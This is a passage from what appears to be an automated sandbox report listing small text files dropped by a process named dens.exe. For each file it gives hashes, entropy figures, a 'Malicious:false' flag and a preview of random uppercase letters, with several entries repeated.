                                                                                                                                                                                                                                            SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                            MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                            SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                            SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                            SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                            MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                            SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                            SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                            SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                            MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                            SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                            SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                            SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694311754777018
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
                                                                                                                                                                                                                                            MD5:61908250A5348CC047FF15260F730C2B
                                                                                                                                                                                                                                            SHA1:CBCF34156EAE25B328A926E21008598EE8D1CBDE
                                                                                                                                                                                                                                            SHA-256:8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
                                                                                                                                                                                                                                            SHA-512:BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:UOOJJOZIRHPVBWNJCWUSWUNTMYTRIXAVHMVNTYLIPCAYUDIDHLMFMKJROINQAVRXUZLNINNJJSHFEFPSZPLVVWBUDRECRECFHEVVEZDHIFPUKQTLDLWAAKNHNLRQDSPWEEVMZICDCINAORJHMIUUNNJHMWJLZHCNXQIZIPHJPLEDKWATEVYJSWRRMCEJGQXHFBOGXKHJFORHFMGMLTTZJKPJBYMKZVWGZAIGHCFNXGRNDDLJZMCZBXDTQVGPSMNLFNFDHXXCXDJJUNSVHDRBZEZFIUQIYSJVDHEFPPPROTSFKVYAURVOKTIKGYYSWJMCPHHISKCOIVXEIQWZICSWMZJVHXNBACFJZRIEQPOISHMZILEXPCMYBSQRASRNWPSMMYPWJFEXHUUJQAMZDZSIKVETWBZUQBTDCCOYIIJFYYHXPZIUCZRQQFYTKLLGWQPTPZJIZHUEFVCDUNPMVORWJRIAYGRRAHBFWKSAMTDEVSHQXJBHBMOINFGNSRFJDWPSMFABPWRZHIOIPNMLHKGNVWQJYVTWLEZDGMBOJLNHPJKWMHWBVAEGELRTQORSRZQBNXOXEHQJHOEQVNZZJSGWQGINLWNPWFSJNPGRBFOBAEJAOEEMVKZTQZEVVODQLWGPNPNOPXEXLEESZERAPVAPHAUNNCEHTNMFJYBTYGSNGBIEDWGUTNCJDESWGYITWPGBEFVMZYUYPQOQBFITFPUQTWZNQFLWVTMUIAOXBCINJDYCHTXVFQFJQSMNUTYABAAOGGEUKHMDYKLCSGIBIFQSYOIRBUYVSCPDGMVNAQBKZPEKHNRNDPIHOUUTPJDKDOACRPOMZOQCOIAOBNPJLJIYDLQLQUMPIRAMVWNBCMMWFDLTUGWRDVGNHOOODYTHAGWDMJKRVJZFYCVLFLQUWEILFSEPBEADHBHFVWZGUZKNXQCRSBRLGIVTWCSHGFTTTPQAKFWFDXDYXWAWDKWXXTMSJSVOBRAYZGGBDPJOGLIZ
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.697336881644685
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:DVE9Jf1tiezZxapTBz4fmlhQHdwc6WS/ZCGxruwyJM:Deu8xafWWKHj6Zx
                                                                                                                                                                                                                                            MD5:08AF516B9E451DB9845289801A21F1BC
                                                                                                                                                                                                                                            SHA1:D43E58D334ACFAE831AD929003D89DC6D3B499F9
                                                                                                                                                                                                                                            SHA-256:C459EA8FCABD26C75606F78F91AA8446698D90422EE4869ABE4ABCCB50B45379
                                                                                                                                                                                                                                            SHA-512:C8C2BB634740DBDDC5928E5FD3960011BB86842B72673FDCE2D65C86AE6D5945F0C88E81AE96DEA711CC654FAC8B4EC809DF18F57BFB4129503DE37E426CF055
                                                                                                                                                                                                                                            Malicious:false
